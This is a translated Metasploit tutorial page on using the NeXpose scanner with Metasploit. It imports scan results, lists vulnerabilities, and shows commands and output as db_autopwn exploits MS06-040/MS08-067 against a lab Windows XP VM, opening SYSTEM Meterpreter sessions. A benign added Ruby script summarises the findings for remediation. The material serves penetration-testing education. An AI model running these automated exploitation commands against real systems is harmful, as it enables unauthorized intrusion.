Working with NeXpose
From www.metasploit-es.com.ar
With Rapid7's acquisition of Metasploit, there is now excellent compatibility between Metasploit and the NeXpose vulnerability scanner. Rapid7 offers a community edition of its scanner at http://www.rapid7.com/vulnerability-scanner.jsp. Once we have installed and updated NeXpose, we run a full credentialed scan against our vulnerable WinXP VM.
We create a new report in NeXpose and save the scan results in 'NeXpose Simple XML' format, which we can later import into Metasploit. We then launch Metasploit, create a new database, and use the 'db_import' command to auto-detect and import our scan results file.
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > db_import /root/report.xml
[*] Importing 'NeXpose Simple XML' data
[*] Importing host 192.168.1.161
[*] Successfully imported /root/report.xml
Now, running the 'db_services' and 'db_vulns' commands displays all the relevant vulnerability information that Metasploit has at its disposal.
msf > db_services
Services
========
created_at               info                      name                               port  proto  state  updated_at               Host           Workspace
----------               ----                      ----                               ----  -----  -----  ----------               ----           ---------
2010-08-22 18:12:03 UTC                            ntp                                123   udp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:05 UTC                            dce endpoint resolution            135   tcp    open   2010-08-22 18:12:05 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC                            cifs name service                  137   udp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC  Windows 2000 LAN Manager  cifs                               139   tcp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
2010-08-22 18:12:06 UTC                            snmp                               161   udp    open   2010-08-22 18:12:06 UTC  192.168.1.161  default
2010-08-22 18:12:05 UTC  Windows 2000 LAN Manager  cifs                               445   tcp    open   2010-08-22 18:12:05 UTC  192.168.1.161  default
2010-08-22 18:12:03 UTC                            microsoft remote display protocol  3389  tcp    open   2010-08-22 18:12:03 UTC  192.168.1.161  default
msf > db_vulns
[*] Time: 2010-08-22 18:12:00 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-08-22 18:12:01 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035
[*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001
[*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp
[*] Time: 2010-08-22 18:12:05 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001
[*] Time: 2010-08-22 18:12:08 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001
[*] Time: 2010-08-22 18:12:09 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
We could certainly use this information to surgically attack specific vulnerabilities, but since we are in our own lab and are not concerned with being stealthy, we will let 'db_autopwn' take full advantage of the situation.
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
We will tell db_autopwn to attack all targets using the vulnerabilities found in the database, and then watch the magic.
msf > db_autopwn -x -e
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.1.101:42662 -> 192.168.1.161:4265) at 2010-08-22 12:14:06 -0600
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
msf >
Just like that, we have a Meterpreter session open and waiting for us!
msf > sessions -l
Active sessions
===============
Id  Type         Information                            Connection
--  ----         -----------                            ----------
1   meterpreter  NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE  192.168.1.101:42662 -> 192.168.1.161:4265
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >
NeXpose from msfconsole
The Metasploit/NeXpose integration is not limited to importing scan result files. You can launch NeXpose scans directly from msfconsole by first loading the 'nexpose' plugin.
msf > load nexpose
____ _ _ _____ _ _ __ __
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | '_ \| |/ _` | / / | \| |/ _ \\ /| '_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > help
NeXpose Commands
================
Command Description
------- -----------
nexpose_activity Display any active scan jobs on the NeXpose instance
nexpose_connect Connect to a running NeXpose instance ( user:pass@host[:port] )
nexpose_disconnect Disconnect from an active NeXpose instance
nexpose_discover Launch a scan but only perform host and minimal service discovery
nexpose_dos Launch a scan that includes checks that can crash services and devices (caution)
nexpose_exhaustive Launch a scan covering all TCP ports and all authorized safe checks
nexpose_scan Launch a NeXpose scan against a specific IP range and import the results
Before launching a scan against a target, we first need to connect to the server running NeXpose using the 'nexpose_connect' command along with the credentials for the NeXpose instance. Note that you will need to append 'ok' to the end of the connection string to allow unverified SSL connections.
msf > nexpose_connect dookie:s3cr3t@192.168.1.152
[-] Warning: SSL connections are not verified in this release, it is possible for an attacker
[-] with the ability to man-in-the-middle the NeXpose traffic to capture the NeXpose
[-] credentials. If you are running this on a trusted network, please pass in 'ok'
[-] as an additional parameter to this command.
msf > nexpose_connect dookie:s3cr3t@192.168.1.152 ok
[*] Connecting to NeXpose instance at 192.168.1.152:3780 with username dookie...
msf >
Now that we are connected to our server, we can run a vulnerability scan directly from within Metasploit.
msf > nexpose_discover -h
Usage: nexpose_scan [options]
OPTIONS:
-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-R Specify a minimum exploit rank to use for automated exploitation
-X Automatically launch all exploits by matching reference and port after the scan completes (unsafe)
-c Specify credentials to use against these targets (format is type:user:pass[@host[:port]]
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the NeXpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process
-x Automatically launch all exploits by matching reference after the scan completes (unsafe)
msf > nexpose_discover 192.168.1.161
[*] Scanning 1 addresses with template aggressive-discovery in sets of 32
[*] Completed the scan of 1 addresses
msf >
Again, we run 'db_services' and 'db_vulns' and can see that the results are of the same quality as those imported via the XML file.
msf > db_services
Services
========
created_at               info                      name                               port  proto  state  updated_at               Host           Workspace
----------               ----                      ----                               ----  -----  -----  ----------               ----           ---------
2010-08-22 18:24:28 UTC                            ntp                                123   udp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC                            dce endpoint resolution            135   tcp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC                            cifs name service                  137   udp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC  Windows 2000 LAN Manager  cifs                               139   tcp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC                            snmp                               161   udp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:30 UTC  Windows 2000 LAN Manager  cifs                               445   tcp    open   2010-08-22 18:24:30 UTC  192.168.1.161  default
2010-08-22 18:24:28 UTC                            microsoft remote display protocol  3389  tcp    open   2010-08-22 18:24:28 UTC  192.168.1.161  default
msf > db_vulns
[*] Time: 2010-08-22 18:24:25 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-08-22 18:24:26 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035
[*] Time: 2010-08-22 18:24:27 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001
[*] Time: 2010-08-22 18:24:28 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp
[*] Time: 2010-08-22 18:24:30 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001
[*] Time: 2010-08-22 18:24:33 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001
[*] Time: 2010-08-22 18:24:35 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
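The 'db_vulns' output above (and the identical listing after the XML import) is what a remediation owner actually needs from this workflow. The following Ruby script is an added example, not part of the original page or of Metasploit itself: it parses those output lines into per-host, per-port records and pulls out the CVE and MS bulletin identifiers. The sample input is copied from the page's output with the reference lists shortened; the record layout and function names are my own.

```ruby
# Added example: turn Metasploit 'db_vulns' output into structured findings.
# Sample lines copied from the page's output, with 'refs=' lists shortened.
DB_VULNS_OUTPUT = <<~OUT
  [*] Time: 2010-08-22 18:24:25 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
  [*] Time: 2010-08-22 18:24:26 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035
  [*] Time: 2010-08-22 18:24:30 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,NEXPOSE-windows-hotfix-ms09-001
  [*] Time: 2010-08-22 18:24:33 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,BID-2807,NEXPOSE-snmp-read-0001
OUT

# One db_vulns line; 'port=' and 'proto=' are only present for service-bound findings.
VULN_LINE = /\A\[\*\] Time: (?<time>\S+ \S+ UTC) Vuln: host=(?<host>\S+)(?: port=(?<port>\d+) proto=(?<proto>\w+))? name=(?<name>\S+) refs=(?<refs>\S+)\z/

# Parse every matching line into a hash; non-matching lines (banners, prompts) are skipped.
def parse_db_vulns(text)
  text.each_line.filter_map do |line|
    m = VULN_LINE.match(line.strip)
    next unless m
    refs = m[:refs].split(',')
    {
      time: m[:time], host: m[:host],
      port: m[:port]&.to_i, proto: m[:proto], name: m[:name],
      cves: refs.grep(/\ACVE-\d{4}-\d+\z/),
      # NeXpose names missing Microsoft bulletins as windows-hotfix-msYY-NNN
      hotfix: m[:name][/windows-hotfix-(ms\d{2}-\d{3})\z/, 1],
    }
  end
end

# Group findings by host/port/proto so each exposed service lists its CVEs
# and the bulletins that would close them. Host-level findings have port nil.
def remediation_summary(vulns)
  vulns.group_by { |v| [v[:host], v[:port], v[:proto]] }.map do |(host, port, proto), vs|
    { host: host, port: port, proto: proto,
      findings: vs.size,
      cves: vs.flat_map { |v| v[:cves] }.uniq.sort,
      hotfixes: vs.filter_map { |v| v[:hotfix] }.uniq }
  end
end

remediation_summary(parse_db_vulns(DB_VULNS_OUTPUT)).each { |row| puts row.inspect }
```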
Since all of this is far too much fun, we will let db_autopwn take over again.
msf > db_autopwn -x -e
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.1.101:51373 -> 192.168.1.161:35156) at 2010-08-22 12:26:49 -0600
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
msf > sessions -l
Active sessions
===============
Id  Type         Information                            Connection
--  ----         -----------                            ----------
2   meterpreter  NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE  192.168.1.101:51373 -> 192.168.1.161:35156
msf > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf >
As we can see, this integration, while still in its early stages, is very beneficial and adds incredible power to Metasploit.
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999